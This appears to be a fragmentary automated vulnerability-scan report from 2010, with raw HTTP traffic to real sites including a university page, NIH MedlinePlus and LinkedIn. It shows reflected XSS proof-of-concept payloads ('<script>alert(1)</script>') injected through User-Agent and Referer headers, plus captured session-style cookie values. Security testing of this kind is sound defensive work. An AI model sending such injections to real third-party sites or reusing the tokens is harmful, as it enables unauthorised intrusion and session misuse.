User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Mon, 15 Nov 2010 22:42:35 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 10884
Connection: Close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 840cd<script>alert(1)</script>f25dc1f7315 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /~mr99164/index.php HTTP/1.1
Host: alas.matf.bg.ac.rs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)840cd<script>alert(1)</script>f25dc1f7315
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 22:41:26 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g DAV/2 mod_jk/1.2.26
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8629

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www ...[SNIP]...
<code class="unos"> 15.11.2010. 23:41:26 alas.matf.bg.ac.rs/174.122.23.218 [Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)840cd<script>alert(1)</script>f25dc1f7315] </code>
...[SNIP]...
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c53f6<script>alert(1)</script>2e07061e556 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /~mr99164/posta.php HTTP/1.1
Host: alas.matf.bg.ac.rs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c53f6<script>alert(1)</script>2e07061e556
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 22:41:26 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g DAV/2 mod_jk/1.2.26
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7892

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www ...[SNIP]...
<code class="unos"> 15.11.2010. 23:41:26 alas.matf.bg.ac.rs/174.122.23.218 [Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c53f6<script>alert(1)</script>2e07061e556] </code>
...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa1fb"><script>alert(1)</script>080bc028c2e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Historically, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /medlineplus/contact/index.cfm HTTP/1.1
Host: apps.nlm.nih.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aa1fb"><script>alert(1)</script>080bc028c2e
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:Z-X_6-mIvra3NGL3_eX_cDmjZa1zywZ7cVnKHx5ABn13J-KjVmFfKP:1289861671:37f09e193f106f13f49040cc95dfe73e1466584b"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:7896604433834199992"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Sun, 04-Dec-2078 02:08:38 GMT; Path=/
Set-Cookie: bcookie="v=1&552cf567-4934-49be-abab-0884e4f8c630"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 04-Dec-2078 02:08:38 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:54:30 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly
Content-Length: 20300
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /groups?home=&gid=2525539 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redhat.com/community/
Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&9d51b8e1-b21b-450f-9529-4bdf8f075257"; JSESSIONID="ajax:7573697098806337810"; leo_auth_token="GST:9DYqDQVGJuxFh_XV2jBAIzGuyYxPq2mHUGhdhrVGJ-guhcSrk-NgWM:1289859827:3120e47d32d8552203729d10fbb502d5495c47c1"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:9uuAD9t1rt6GhtJBSowdWKtaCwEtPDC-z-D2uOhpwt7WdpSBfBWInu:1289861671:aff9f67088db4a37cbd64452dad347683ea3f899"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:54:30 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly
Content-Length: 15038
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
POST /languageSelector HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.linkedin.com/
Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&940a8e78-9a51-44d2-9ac8-8c09be81ae88"; JSESSIONID="ajax:2419415598030071254"; leo_auth_token="GST:ZU_zld0-KNXoIUmqxmEeKdziw_Xg1Anfc3c7KsT4K2Fg5ZMq2y94H-:1289859826:8dbc5457ef02c54efb2b784b5b95f8d982c0fbba"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
POST /ns HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.linkedin.com/
Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&fdfe5b14-edf4-40b7-8977-bde052b3e77f"; JSESSIONID="ajax:1219787687806042432"; leo_auth_token="GST:93uAUi_hHjsJ5-iihCDfjm_DCssmLDOrPkwqUR6hxYo-3GiMtL2tb9:1289859826:4d8fbdcdc16ae91308e53ced09235692d4ab0b84"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Response
HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8Y4zwT1IiPk7oqOE8qJ3_9CsBhk9ojJE0wisgF5L82k7Vj1KZR-Vih:1289861671:86ef1f0c0e6cc59be504fe9935d7df41aea4ec40"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Location: http://www.linkedin.com/pub/dir/?first=Peter&last=Wiener
Content-Length: 0
Date: Mon, 15 Nov 2010 22:54:30 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly
3. Password field with autocomplete enabled
Summary
Severity: Low
Confidence: Certain
Host: http://www.linkedin.com
Path: /groups
Issue detail
The page contains a form with the following action URL:
https://www.linkedin.com/secure/login
The form contains the following password field with autocomplete enabled:
session_password
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
Request
GET /groups?home=&gid=2525539 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redhat.com/community/
Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&9d51b8e1-b21b-450f-9529-4bdf8f075257"; JSESSIONID="ajax:7573697098806337810"; leo_auth_token="GST:9DYqDQVGJuxFh_XV2jBAIzGuyYxPq2mHUGhdhrVGJ-guhcSrk-NgWM:1289859827:3120e47d32d8552203729d10fbb502d5495c47c1"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:9uuAD9t1rt6GhtJBSowdWKtaCwEtPDC-z-D2uOhpwt7WdpSBfBWInu:1289861671:aff9f67088db4a37cbd64452dad347683ea3f899"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:54:30 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly
Content-Length: 15038
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:Z-X_6-mIvra3NGL3_eX_cDmjZa1zywZ7cVnKHx5ABn13J-KjVmFfKP:1289861671:37f09e193f106f13f49040cc95dfe73e1466584b"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:7896604433834199992"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Sun, 04-Dec-2078 02:08:38 GMT; Path=/
Set-Cookie: bcookie="v=1&552cf567-4934-49be-abab-0884e4f8c630"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 04-Dec-2078 02:08:38 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:54:30 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly
Content-Length: 20300
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /groups?home=&gid=2525539 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redhat.com/community/
Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&9d51b8e1-b21b-450f-9529-4bdf8f075257"; JSESSIONID="ajax:7573697098806337810"; leo_auth_token="GST:9DYqDQVGJuxFh_XV2jBAIzGuyYxPq2mHUGhdhrVGJ-guhcSrk-NgWM:1289859827:3120e47d32d8552203729d10fbb502d5495c47c1"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:9uuAD9t1rt6GhtJBSowdWKtaCwEtPDC-z-D2uOhpwt7WdpSBfBWInu:1289861671:aff9f67088db4a37cbd64452dad347683ea3f899"; Version=1; Max-Age=1799; Expires=Mon, 15-Nov-2010 23:24:30 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:54:30 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0;expires=Mon, 15-Nov-2010 23:24:26 GMT;path=/;httponly
Content-Length: 15038
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /languageSelector HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.linkedin.com/
Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&940a8e78-9a51-44d2-9ac8-8c09be81ae88"; JSESSIONID="ajax:2419415598030071254"; leo_auth_token="GST:ZU_zld0-KNXoIUmqxmEeKdziw_Xg1Anfc3c7KsT4K2Fg5ZMq2y94H-:1289859826:8dbc5457ef02c54efb2b784b5b95f8d982c0fbba"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /ns HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.linkedin.com/
Cookie: NSC_MC_QH_MFP=ffffffffaf19206945525d5f4f58455e445a4a4229a0; bcookie="v=1&fdfe5b14-edf4-40b7-8977-bde052b3e77f"; JSESSIONID="ajax:1219787687806042432"; leo_auth_token="GST:93uAUi_hHjsJ5-iihCDfjm_DCssmLDOrPkwqUR6hxYo-3GiMtL2tb9:1289859826:4d8fbdcdc16ae91308e53ced09235692d4ab0b84"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
The page was loaded from a URL containing a query string:
http://go.microsoft.com/fwlink/?LinkId=121315
The response contains the following link to another domain:
http://www.ieaddons.com/en/ie8slice/Default.aspx
Request
GET /fwlink/?LinkId=121315 HTTP/1.1
Accept: */*
If-Modified-Since: Sun, 14 Nov 2010 22:10:24 GMT
A-IM: feed
Accept-Language: en-US
User-Agent: Windows-RSS-Platform/2.0 (MSIE 8.0; Windows NT 6.1)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: go.microsoft.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: A=I&I=AxUFAAAAAACMBwAAy3eITXpGsXEo3SGfnFhbmg!!
Response
HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 165
Content-Type: text/html; charset=utf-8
Expires: Mon, 15 Nov 2010 22:53:51 GMT
Location: http://www.ieaddons.com/en/ie8slice/Default.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 15 Nov 2010 22:54:51 GMT

<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.ieaddons.com/en/ie8slice/Default.aspx">here</a>.</h2> </body></html>
The response contains the following Content-type statement:
Content-type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /robots.txt HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 15 Nov 2010 22:54:31 GMT
Content-length: 1444
Content-type: text/plain
Last-modified: Fri, 22 Oct 2010 00:07:11 GMT
Etag: W/"5a4-4cc0d5af"